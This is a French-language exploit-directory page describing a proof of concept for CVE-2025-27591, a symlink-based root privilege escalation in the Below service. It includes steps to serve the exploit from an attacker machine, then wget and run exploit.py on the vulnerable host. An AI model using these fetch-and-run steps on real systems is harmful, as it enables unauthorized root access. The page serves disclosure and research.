Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27591-PoC — CVE-2025-27591 est une vulnérabilité d'élévation de privilèges qui a affecté le service Below avant la version 0.9.0 | Kitploit
Outils/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et Éducation
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 est une vulnérabilité d'élévation de privilèges qui a affecté le service Below avant la version 0.9.0

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
3225il y a 1 anVérifié par Kitploit

Preuve de concept CVE-2025-27591

CVE-2025-27591 est une vulnérabilité d'élévation de privilèges qui a affecté le service Below avant la version 0.9.0. Le problème est survenu en raison de la création d'un répertoire accessible en écriture par tout le monde à /var/log/below. Un attaquant pouvait exploiter cette vulnérabilité en manipulant des liens symboliques dans ce répertoire et potentiellement obtenir les privilèges root, ce qui en fait une préoccupation de sécurité importante pour les utilisateurs locaux non privilégiés.

Cette preuve de concept a été écrite à des fins éducatives et de recherche uniquement.

Au moment de la rédaction, aucune preuve de concept publiquement disponible pour cette vulnérabilité n'existait dans la communauté. Par conséquent, j'ai décidé de partager cette implémentation de manière responsable afin de combler cette lacune, contribuer à l'écosystème de recherche en sécurité et sensibiliser à la nature critique d'un système de fichiers non sécurisé.

Cause de la vulnérabilité

image

Preuve de concept

Depuis la machine de l'attaquant :

1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2-cd CVE-2025-27591-PoC

3-python3 -m http.server 80

Depuis le système vulnérable :

1- wget http:///exploit.py

2-python exploit.py

image

Références

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

Télécharger l’outil